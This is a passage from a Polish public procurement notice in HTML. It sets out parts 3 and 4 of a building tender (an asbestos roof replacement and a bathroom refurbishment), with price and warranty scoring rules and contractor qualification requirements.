Okresu Gwarancji należy podać w pełnych miesiącach zgodnie z poniższym schematem (tj. 3 miesięcy, albo krotność). Ilość miesięcy należy podać w liczbach naturalnych (bez ułamków). W przypadku podania w formularzu (załączniki nr 2 do SWZ) oferty liczby miesięcy z ułamkami, liczby ujemnej albo niepodania w formularzu oferty żadnej wartości liczbowej, oferta taka otrzyma 0 (słownie: zero) punktów w tym kryterium. W ramach kryterium „Okres Gwarancji” ocena ofert zostanie dokonana przy zastosowaniu <br/>następującego schematu: <br/><br/>wydłużenie okresu gwarancji o: <br/><br/>liczba punktów:<br/>6 miesięcy 10 pkt.<br/>12 miesięcy 20 pkt.<br/>18 miesięcy 30 pkt.<br/>24 miesiące 40 pkt.<br/><br/>W przypadku zaoferowania wydłużenia Gwarancji ponad 24 miesięcy, do oceny ofert zostanie przyjęte wydłużenie okresu gwarancji tylko o 24 miesiące. <br/>3. Za najkorzystniejszą ofertę w danej części zamówienia uznana zostanie oferta, która uzyska największą sumę punktów uzyskanych w ww. kryteriach oceny ofert, wyliczoną zgodnie ze wzorem: <br/>O = Wc + Wg<br/>Oferta może uzyskać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty ogólnobudowlane wymiany pokrycia dachowego z płyt azbestowo-cementowych falistych na blachę dachówkową wraz z wymianą łat, przedłużeniem końcowych odcinków krokwi dachowych, wymianą krokwi skrajnych, wymianą obróbek blacharskich, desek podbicia okapów i szczytowych krawędzi dachu oraz montażem folii dachowej paroprzepuszczalnej. Zamówienie obejmuje również wymianę rynien i rur <br/>spustowych, przemurowanie komina z cegły nad dachem, wymianę instalacji odgromowej i utylizację materiałów porozbiórkowych. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 83362,91 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)Zamawiający jest uprawniony zlecić Wykonawcy do realizacji zakres rzeczowy obejmujący roboty budowlane analogiczne jak opisane w SWZ dla zamówienia podstawowego („Opcja”). Zamawiający nie jest zobowiązany do zlecenia robót objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie.<br/>2) Zamawiający zleci Wykonawcy wykonanie Opcji, o ile zajdą następujące <br/>okoliczności: Zamawiający uzyska dodatkowe środki finansowe na realizację <br/>zamówienia, po złożeniu w formie pisemnej z odpowiednim, tj. co najmniej 3 <br/>dniowym, wyprzedzeniem stosownego oświadczenia Zamawiającego o <br/>uruchomieniu opcji zawierającego określenie zakresu prac, które powinny zostać wykonane w ramach Opcji, a także terminu ich wykonania (rozpoczęcia <br/>i zakończenia). <br/>3) Jeżeli wykonanie zleconych w ramach Opcji prac w pierwotnie ustalonym terminie umownym będzie niemożliwe, to termin realizacji umowy może ulec przedłużeniu maksymalnie o czas niezbędny do wykonania Opcji.<br/>4) Koszt robót będących przedmiotem Opcji nie może przekroczyć 20% wartości umownej podstawowego zakresu rzeczowego określonego w opisie przedmiotu zamówienia.<br/>5) Zlecanie robót będących przedmiotem Opcji, ich odbiór, ustalenie wartości tych dostaw, uiszczanie zapłaty oraz odpowiedzialność za ich niewykonanie lub nienależyte wykonanie, w tym odpowiedzialność w postaci kar umownych, jak również realizacja uprawnień Zamawiającego wynikających z umowy, w tym realizacja prawa do odstąpienia od umowy następować będzie na analogicznych zasadach, jak w przypadku prac będących przedmiotem umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenie w okresie 3 lat od dnia udzielenia zamówienia podstawowego, zamówienia polegającego na powtórzeniu podobnych robót budowlanych i zgodnego z przedmiotem zamówienia podstawowego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp – o wartości do 50% wartości zamówienia podstawowego.<br/>2. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone w szczególności w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót stanowiących przedmiot zamówienia na skutek warunków atmosferycznych, wystąpienia robót dodatkowych i zamiennych lub powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych.<br/>3. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze ofert w każdej części zamówienia Zamawiający będzie się kierował <br/> następującymi kryteriami oceny ofert:<br/> <br/> Cena oferowana brutto - 60 %,<br/> Wydłużenie okresu gwarancji - 40 %<br/><br/>2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>a) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru: <br/> Cn <br/>W c = ------------ x 100 pkt. x 60 % <br/> Co <br/>gdzie:<br/>W c - liczba punktów w ramach kryterium „Cena”,<br/>C n - najniższa cena spośród ofert ocenianych,<br/>C o - cena oferty ocenianej. <br/>Ocenie w ramach kryterium „cena” podlegać będzie cena łączna brutto podana w formularzu oferty (załączniki nr 1 do SWZ).<br/><br/>b) W ramach kryterium „Wydłużenie okresu gwarancji - Wg” oceniane będzie wydłużenie okresu Gwarancji na wykonane roboty budowlane w stosunku do minimalnego Okresu Gwarancji (tj. powyżej 24 miesięcy od dnia odbioru końcowego robót). Minimalny okres Gwarancji jaki będzie obowiązywał niezależnie od oferty Wykonawcy wynosi 24 miesiące i będzie liczony począwszy od daty odbioru końcowego robót. Do oceny w ramach kryterium <br/>zostanie przyjęty Okres Gwarancji zawarty w formularzu oferty. Wydłużenie Okresu Gwarancji należy podać w pełnych miesiącach zgodnie z poniższym schematem (tj. 3 miesięcy, albo krotność). Ilość miesięcy należy podać w liczbach naturalnych (bez ułamków). W przypadku podania w formularzu (załączniki nr 2 do SWZ) oferty liczby miesięcy z ułamkami, liczby ujemnej albo niepodania w formularzu oferty żadnej wartości liczbowej, oferta taka otrzyma 0 (słownie: zero) punktów w tym kryterium. W ramach kryterium „Okres Gwarancji” ocena ofert zostanie dokonana przy zastosowaniu <br/>następującego schematu: <br/><br/>wydłużenie okresu gwarancji o: <br/><br/>liczba punktów:<br/>6 miesięcy 10 pkt.<br/>12 miesięcy 20 pkt.<br/>18 miesięcy 30 pkt.<br/>24 miesiące 40 pkt.<br/><br/>W przypadku zaoferowania wydłużenia Gwarancji ponad 24 miesięcy, do oceny ofert zostanie przyjęte wydłużenie okresu gwarancji tylko o 24 miesiące. <br/>3. Za najkorzystniejszą ofertę w danej części zamówienia uznana zostanie oferta, która uzyska największą sumę punktów uzyskanych w ww. kryteriach oceny ofert, wyliczoną zgodnie ze wzorem: <br/>O = Wc + Wg<br/>Oferta może uzyskać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty ogólnobudowlane i instalacyjne przebudowy pomieszczeń sanitarnych w istniejącym budynku (dwie łazienki z wc), pomieszczenia komunikacji wewnętrznej i pomieszczenia gospodarczego z likwidacją barier dla osób niepełnosprawnych. Zakres robót obejmuje rozbiórkę ścianek działowych z cegły i wykonanie ścianek szkieletowych nowego podziału, wymianę stolarki drzwiowej wewnętrznej, wymianę podłoży betonowych i <br/>posadzek z założeniem izolacji p.wilgociowych i montażem instalacji ogrzewania podłogowego, montażem tynków k-g i wykonaniem posadzek i okładzin ściennych z płytek ceramicznych oraz instalacji elektrycznej, wod-kan i grzejników c.o. w łazienkach. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 104940,44 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)Zamawiający jest uprawniony zlecić Wykonawcy do realizacji zakres rzeczowy obejmujący roboty budowlane analogiczne jak opisane w SWZ dla zamówienia podstawowego („Opcja”). Zamawiający nie jest zobowiązany do zlecenia robót objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie.<br/>2) Zamawiający zleci Wykonawcy wykonanie Opcji, o ile zajdą następujące <br/>okoliczności: Zamawiający uzyska dodatkowe środki finansowe na realizację <br/>zamówienia, po złożeniu w formie pisemnej z odpowiednim, tj. co najmniej 3 <br/>dniowym, wyprzedzeniem stosownego oświadczenia Zamawiającego o <br/>uruchomieniu opcji zawierającego określenie zakresu prac, które powinny zostać wykonane w ramach Opcji, a także terminu ich wykonania (rozpoczęcia <br/>i zakończenia). <br/>3) Jeżeli wykonanie zleconych w ramach Opcji prac w pierwotnie ustalonym terminie umownym będzie niemożliwe, to termin realizacji umowy może ulec przedłużeniu maksymalnie o czas niezbędny do wykonania Opcji.<br/>4) Koszt robót będących przedmiotem Opcji nie może przekroczyć 20% wartości umownej podstawowego zakresu rzeczowego określonego w opisie przedmiotu zamówienia.<br/>5) Zlecanie robót będących przedmiotem Opcji, ich odbiór, ustalenie wartości tych dostaw, uiszczanie zapłaty oraz odpowiedzialność za ich niewykonanie lub nienależyte wykonanie, w tym odpowiedzialność w postaci kar umownych, jak również realizacja uprawnień Zamawiającego wynikających z umowy, w tym realizacja prawa do odstąpienia od umowy następować będzie na analogicznych zasadach, jak w przypadku prac będących przedmiotem umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenie w okresie 3 lat od dnia udzielenia zamówienia podstawowego, zamówienia polegającego na powtórzeniu podobnych robót budowlanych i zgodnego z przedmiotem zamówienia podstawowego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp – o wartości do 50% wartości zamówienia podstawowego.<br/>2. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone w szczególności w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót stanowiących przedmiot zamówienia na skutek warunków atmosferycznych, wystąpienia robót dodatkowych i zamiennych lub powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych.<br/>3. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze ofert w każdej części zamówienia Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/> <br/> Cena oferowana brutto - 60 %,<br/> Wydłużenie okresu gwarancji - 40 %<br/><br/>2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>a) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru: <br/> Cn <br/>W c = ------------ x 100 pkt. x 60 % <br/> Co <br/>gdzie:<br/>W c - liczba punktów w ramach kryterium „Cena”,<br/>C n - najniższa cena spośród ofert ocenianych,<br/>C o - cena oferty ocenianej. <br/>Ocenie w ramach kryterium „cena” podlegać będzie cena łączna brutto podana w formularzu oferty (załączniki nr 1 do SWZ).<br/><br/>b) W ramach kryterium „Wydłużenie okresu gwarancji - Wg” oceniane będzie wydłużenie okresu Gwarancji na wykonane roboty budowlane w stosunku do minimalnego Okresu Gwarancji (tj. powyżej 24 miesięcy od dnia odbioru końcowego robót). Minimalny okres Gwarancji jaki będzie obowiązywał niezależnie od oferty Wykonawcy wynosi 24 miesiące i będzie liczony począwszy od daty odbioru końcowego robót. Do oceny w ramach kryterium <br/>zostanie przyjęty Okres Gwarancji zawarty w formularzu oferty. Wydłużenie Okresu Gwarancji należy podać w pełnych miesiącach zgodnie z poniższym schematem (tj. 3 miesięcy, albo krotność). Ilość miesięcy należy podać w liczbach naturalnych (bez ułamków). W przypadku podania w formularzu (załączniki nr 2 do SWZ) oferty liczby miesięcy z ułamkami, liczby ujemnej albo niepodania w formularzu oferty żadnej wartości liczbowej, oferta taka otrzyma 0 (słownie: zero) punktów w tym kryterium. W ramach kryterium „Okres Gwarancji” ocena ofert zostanie dokonana przy zastosowaniu <br/>następującego schematu: <br/><br/>wydłużenie okresu gwarancji o: <br/><br/>liczba punktów:<br/>6 miesięcy 10 pkt.<br/>12 miesięcy 20 pkt.<br/>18 miesięcy 30 pkt.<br/>24 miesiące 40 pkt.<br/><br/>W przypadku zaoferowania wydłużenia Gwarancji ponad 24 miesięcy, do oceny ofert zostanie przyjęte wydłużenie okresu gwarancji tylko o 24 miesiące. <br/>3. Za najkorzystniejszą ofertę w danej części zamówienia uznana zostanie oferta, która uzyska największą sumę punktów uzyskanych w ww. kryteriach oceny ofert, wyliczoną zgodnie ze wzorem: <br/>O = Wc + Wg<br/>Oferta może uzyskać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) W zakresie doświadczenia. Zamawiający uzna warunek za spełnionym, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie) zrealizował lub realizuje należycie: co najmniej jedną lub więcej robót budowlanych polegających na remoncie, przebudowie lub budowie budynku, o łącznej wartości brutto nie niższej niż:<br/>Dla części nr. 1: 500 000,00 zł brutto.<br/>Dla części nr. 2: 200 000,00 zł brutto.<br/>Dla części nr. 3: 50 000,00 zł brutto.<br/>Dla części nr. 4: 50 000,00 zł brutto.<br/>Wartości podane w dokumentach w walutach innych niż PLN będą przeliczone w następujący sposób: wartość zrealizowanych robót – wg średniego kursu NBP z dnia podanego, jako termin wykonania zamówienia (tj. dnia zakończenia realizacji zamówienia). Jeżeli w tym dniu kurs danej waluty nie był ogłaszany w NBP, obowiązuje kurs ogłoszony bezpośrednio przed tym dniem.<br/>Nie jest wymagane dysponowanie w/w doświadczeniem na każdą część osobno. tj. doświadczenie 500 000,00 brutto będzie wystarczające do ubiegania się o udzielenie zamówienia na wszystkie części (dotyczy części nr 1-4), doświadczenie 200 000,00 brutto będzie wystarczające do ubiegania się o udzielenie zamówienia na części 2- 4 a doświadczenie 50 000,00 brutto będzie wystarczające do ubiegania się o udzielenie zamówienia na części 3- 4.<br/><br/>2) W zakresie osób skierowanych do realizacji zamówienia<br/>Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponował następującymi co najmniej niżej opisanymi osobami, które skieruje do realizacji zamówienia, w tym:<br/>a) co najmniej jedną osobą z uprawnieniami kierownika budowy posiadającego uprawnienia budowlane w zakresie kierowania robotami w specjalności konstrukcyjno-budowlanej zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (t. j. Dz. U. 2021 r., poz. 2351) albo odpowiadające im inne uprawnienie dopuszczone prawem, <br/>Nie jest wymagane dysponowanie w/w osobą na każdą część osobno.<br/> b) osobami posiadającymi następujące uprawnienia i kwalifikacje zawodowe:<br/>b.1.) dla części I i II:<br/>- co najmniej czterema osobami posiadającymi kwalifikacje zawodowe w następujących zawodach, odpowiednio: monter zabudowy i robót wykończeniowych w budownictwie (1. os.), cieśla (1. os.), dekarz (1. os.), elektryk (1. os.). Kwalifikacje zawodowe uzyskane w ramach krajowego systemu oświaty, o których mowa w przepisach Rozporządzenia Ministra Edukacji Narodowej z dnia 15 lutego 2019 r. w sprawie ogólnych celów i zadań kształcenia w zawodach szkolnictwa branżowego oraz klasyfikacji zawodów szkolnictwa branżowego (Dz. U. 2019 r., poz. 316) lub odpowiadające im rodzajowo kwalifikacje zawodowe uzyskane na podstawie <br/>poprzednio obowiązujących przepisów lub odpowiadające im rodzajowo kwalifikacje zawodowe zdobyte za granicą;<br/>- w tym co najmniej jedną osobą posiadającą świadectwo kwalifikacyjne uprawniające do wykonywania czynności związanych z eksploatacją urządzeń, instalacji i sieci elektroenergetycznych o napięciu znamionowym co najmniej 1 kV oraz eksploatacją aparatury kontrolno-pomiarowej dla tych urządzeń, uzyskane na podstawie przepisów rozporządzenia Ministra Klimatu i Środowiska z dnia 1 lipca 2022 r. w sprawie szczegółowych zasad<br/>stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. 2022 r., poz. 1392) lub odpowiadające im rodzajowo uprawnienia uzyskane na podstawie wcześniej obowiązujących lub odpowiadające im rodzajowo uprawnienia zagraniczne;<br/><br/>b.2.) dla części III:<br/>- co najmniej trzema osobami posiadającymi kwalifikacje zawodowe w następujących zawodach, odpowiednio: cieśla (1. os.), dekarz (1. os.), elektryk (1. os.). Kwalifikacje zawodowe uzyskane w ramach krajowego systemu oświaty, o których mowa w przepisach Rozporządzenia Ministra Edukacji Narodowej z dnia 15 lutego 2019 r. w sprawie ogólnych celów i zadań kształcenia w zawodach szkolnictwa branżowego oraz klasyfikacji zawodów <br/>szkolnictwa branżowego (Dz. U. 2019 r., poz. 316) lub odpowiadające im rodzajowo kwalifikacje zawodowe uzyskane na podstawie poprzednio obowiązujących przepisów lub odpowiadające im rodzajowo kwalifikacje zawodowe zdobyte za granicą;<br/>- w tym co najmniej jedną osobą posiadającą świadectwo kwalifikacyjne uprawniające do wykonywania czynności związanych z eksploatacją urządzeń, instalacji i sieci elektroenergetycznych o napięciu znamionowym co najmniej 1 kV oraz eksploatacją aparatury kontrolno-pomiarowej dla tych urządzeń, uzyskane na podstawie przepisów rozporządzenia Ministra Klimatu i Środowiska z dnia 1 lipca 2022 r. w sprawie szczegółowych zasad <br/>stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. 2022 r., poz. 1392) lub odpowiadające im rodzajowo uprawnienia uzyskane na podstawie wcześniej obowiązujących lub odpowiadające im rodzajowo uprawnienia zagraniczne;<br/><br/>b.3.) dla części IV:<br/>- co najmniej trzema osobami posiadającymi kwalifikacje zawodowe w następujących zawodach, odpowiednio: monter zabudowy i robót wykończeniowych w budownictwie (1. os.), Monter sieci i instalacji sanitarnych (1. os.), elektryk (1. os.). Kwalifikacje zawodowe uzyskane w <br/>ramach krajowego systemu oświaty, o których mowa w przepisach Rozporządzenia Ministra Edukacji Narodowej z dnia 15 lutego 2019 r. w sprawie ogólnych celów i zadań kształcenia w zawodach szkolnictwa branżowego oraz klasyfikacji zawodów szkolnictwa branżowego (Dz. U. <br/>2019 r., poz. 316) lub odpowiadające im rodzajowo kwalifikacje zawodowe uzyskane na podstawie poprzednio obowiązujących przepisów lub odpowiadające im rodzajowo kwalifikacje zawodowe zdobyte za granicą;<br/>- w tym co najmniej jedną osobą posiadającą świadectwo kwalifikacyjne uprawniające do wykonywania czynności związanych z eksploatacją urządzeń, instalacji i sieci elektroenergetycznych o napięciu znamionowym co najmniej 1 kV oraz eksploatacją aparatury kontrolno-pomiarowej dla tych urządzeń, uzyskane na podstawie przepisów rozporządzenia Ministra Klimatu i Środowiska z dnia 1 lipca 2022 r. w sprawie szczegółowych zasad <br/>stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. 2022 r., poz. 1392) lub odpowiadające im rodzajowo uprawnienia uzyskane na podstawie wcześniej obowiązujących lub odpowiadające im rodzajowo uprawnienia zagraniczne;<br/><br/>Nie jest wymagane aby każda z osób posiadała cały wymieniony wyżej zakres przygotowania zawodowego.<br/>Nie jest wymagane dysponowanie w/w osobą na każdą część osobno. <br/><br/>3) W zakresie dysponowania potencjałem technicznym. Wykonawca dysponuje (lub będzie dysponować) co najmniej następującymi sprzętem:<br/>- co najmniej 1 samochód dostawczy o ładowności min. 1t. <br/>Nie jest wymagane dysponowanie w/w sprzętem na każdą część oddzielnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Informacja o oświadczeniach i dokumentach jakie Wykonawca musi złożyć wraz z ofertą:<br/>1) Do oferty każdy Wykonawca musi dołączyć „Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu”, w zakresie wskazanym przez Zamawiającego odpowiednio w rozdziale 6 ust. 1, ust. 4 i ust. 5 oraz w rozdziale 5 ust. 2 pkt 1), pkt 2) i pkt 3) SWZ (wzór oświadczenia stanowi załącznik nr 3 do SWZ). Oświadczenie to stanowić będzie dowód, potwierdzający brak podstaw wykluczenia lub spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>2) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, „Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu”, o którym mowa w pkt 1) powyżej, musi złożyć z osobna każdy z Wykonawców. Oświadczenia te mają potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniem o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, także „Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu” podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>2). W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego Zamawiający żąda:<br/>a) oświadczenia, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów (Dz.U. z 2021 r., poz. 275), z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi załącznik nr 9 do SWZ),<br/>b) Oświadczenia o aktualności informacji zawartych w Oświadczeniu o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie podstaw wykluczenia z postępowania (wzór oświadczenia stanowi załącznik nr 10 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4. Podmiotowe środki dowodowe, które na wezwanie Zamawiającego zobowiązany będzie złożyć Wykonawca, którego oferta zostanie najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualne na dzień ich złożenia. <br/>1) W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w <br/>postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda: <br/>a) Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat (liczonych wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty <br/>- w zakresie niezbędnym do wykazania spełniania warunku udziału w postępowaniu, określonego w rozdz. 5 ust. 2. pkt 1) niniejszego SWZ (wzór wykazu stanowi załącznik nr 6 do SWZ);<br/><br/>b) Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia <br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług lub <br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - w zakresie niezbędnym do wykazania spełniania warunku udziału w postępowaniu, określonego w rozdz. 5 ust. 2. pkt 2) niniejszego SWZ (wzór wykazu stanowi załącznik nr 7 do SWZ);<br/><br/>c) Wykazu urządzeń technicznych dostępnych Wykonawcy w celu wykonania <br/>zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami - w zakresie niezbędnym do wykazania spełniania warunku udziału w postępowaniu, określonego w rozdz. 5 ust. 2. pkt 3) niniejszego SWZ (wzór wykazu stanowi załącznik nr 8 do SWZ). Uwaga! Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych lub usług wykonywanych wspólnie z innymi Wykonawcami, wykaz o<br/>którym mowa w lit. a), dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span 